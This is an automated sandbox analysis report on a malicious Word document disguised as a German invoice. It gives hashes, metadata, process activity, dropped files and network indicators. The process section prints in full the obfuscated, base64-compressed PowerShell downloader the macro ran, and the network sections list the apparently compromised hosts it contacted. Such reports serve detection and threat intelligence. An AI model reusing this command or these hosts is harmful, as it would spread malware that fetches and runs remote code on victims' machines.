analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rechnung-FCU91494556.doc

Full analysis: https://app.any.run/tasks/03c3453a-3488-4adb-82cb-10c424c2ce77
Verdict: Malicious activity
Analysis date: March 14, 2019, 17:42:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Ikirod-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 11 12:07:00 2018, Last Saved Time/Date: Wed Jul 11 12:07:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0, Title: 11260Ik71295, Subject: 74965Ik9537
MD5:

F212304055F1BC6F52AF93D112471483

SHA1:

117AC1CBB36AC971F1EF9F2E1953B61B8A190F91

SHA256:

E571E2DDE219F648861718EEAE29F73707447FD4B7EF8C8D1DBE0A82C458DCEA

SSDEEP:

6144:jFVeEsjdXRC3jexGG6fYWofNCHds/+Nk9H05wOmyvXR5:jFVeEwdXET0i8NCHds/+C058yvXb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2744)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2744)
    • Changes settings of System certificates

      • powershell.exe (PID: 3864)
    • Request from PowerShell which ran from Office

      • powershell.exe (PID: 3864)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3864)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2744)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2744)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Category: 14680Ik92832
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: 31757Ik8724
CodePage: Windows Latin 1 (Western European)
Subject: 74965Ik9537
Title: 11260Ik71295
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:07:11 11:07:00
CreateDate: 2018:07:11 11:07:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Author: Ikirod-PC
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2744"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rechnung-FCU91494556.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3864powershell (NEw-OBjEct SySTEm.IO.comPreSSioN.DEFLaTeStrEaM( [SystEM.iO.MEmoryStReam] [COnvErT]::fROmBASe64STRINg( 'VZBda8IwFIb/Si8CUZwJ+0CYoSBz7AO26SYoG7tJ4plNlyY1PTOzxf8+26t5cy7e9+GB95CPpzp1EIde5aAxeQFkK1BTa8ChIO8P85RmiOWY8xgjk5tcVsyHDS/45H9u0TgVvKuZ9gXDwG+m1cyfMFAoqaVtAT4fyYvzx+eTHoPcgf1B4x0za65VeZ9drk6Qwitju7OXRSdavuZ2uV0ip2xRWoM9OqF9QWaLmKQJHV1fUUHe6pgScLsxQlEO6CcdtP2AMvgFKr58AKmzHtnGPDEuaTf3Gwz7hhx/w259dNbL9Z2x0DFnSSvsiwXKgMN58BqqqsuEOpq+xUFL1FlzOPwB' ), [iO.compRESsIon.COMPResSIONmoDe]::DeComPRESS) | FoREaCh-oBJecT{NEw-OBjEct IO.sTReaMReAder($_ , [texT.Encoding]::asCii )} ).reaDtoEND( ) |InVoke-EXPreSsion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 290
Read events
887
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2744WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC50B.tmp.cvr
MD5:
SHA256:
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NGWS405BYI0ABMFLKGWX.temp
MD5:
SHA256:
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2744WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F9A0F18EACC74B893F429636D21B21D3
SHA256:056B2143329E6BFAF0ECE21ECFCC0A9F53D0463E3837E8848A3217CF08522688
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19d1ae.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3864powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\74FBF93595CFC8459196065CE54AD928binary
MD5:F48C7E3B9311307842B241905B5AC844
SHA256:5802D18A92A738AC1BE84AF89043671956CC214002D2316960DF4EC2BCBCE6B6
2744WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$chnung-FCU91494556.docpgc
MD5:B5C7E45D9FC932B05ECCB608949406A2
SHA256:F07074E915AC39DA808B82ACF70D7B05F81C03FB59E7DC223B6E3F6DB3CA4799
3864powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\74FBF93595CFC8459196065CE54AD928der
MD5:1EDAF9AE99CE2920667D0E9A8B3F8C9C
SHA256:4F32D5DC00F715250ABCC486511E37F501A899DEB3BF7EA8ADBBD3AEF1C412DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
8
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3864
powershell.exe
GET
301
82.223.15.184:80
http://www.embacal.com/P6a21IM/
ES
suspicious
3864
powershell.exe
GET
159.89.197.57:80
http://www.agjas.org/m/
US
suspicious
3864
powershell.exe
GET
159.89.197.57:80
http://www.agjas.org/m/
US
suspicious
3864
powershell.exe
GET
404
82.223.15.184:80
http://embacal.com/P6a21IM/
ES
html
19.4 Kb
suspicious
3864
powershell.exe
GET
200
91.199.212.52:80
http://crt.comodoca.com/COMODORSAAddTrustCA.crt
GB
der
1.37 Kb
whitelisted
3864
powershell.exe
GET
301
176.31.100.201:80
http://www.altinbronz.com.tr/BCsOo/
FR
html
331 b
malicious
3864
powershell.exe
GET
404
185.171.90.34:80
http://www.mobilmobilyam.com/VQjlVqVt/
TR
html
29.1 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3864
powershell.exe
176.31.100.201:443
www.altinbronz.com.tr
OVH SAS
FR
suspicious
3864
powershell.exe
176.31.100.201:80
www.altinbronz.com.tr
OVH SAS
FR
suspicious
3864
powershell.exe
159.89.197.57:80
www.agjas.org
US
suspicious
3864
powershell.exe
82.223.15.184:80
www.embacal.com
1&1 Internet SE
ES
suspicious
3864
powershell.exe
185.171.90.34:80
www.mobilmobilyam.com
Dgn Teknoloji A.s.
TR
suspicious
3864
powershell.exe
91.199.212.52:80
crt.comodoca.com
Comodo CA Ltd
GB
suspicious

DNS requests

Domain
IP
Reputation
www.agjas.org
  • 159.89.197.57
unknown
www.altinbronz.com.tr
  • 176.31.100.201
malicious
crt.comodoca.com
  • 91.199.212.52
whitelisted
www.embacal.com
  • 82.223.15.184
suspicious
embacal.com
  • 82.223.15.184
suspicious
www.travelution.id
suspicious
www.mobilmobilyam.com
  • 185.171.90.34
suspicious

Threats

No threats detected
No debug info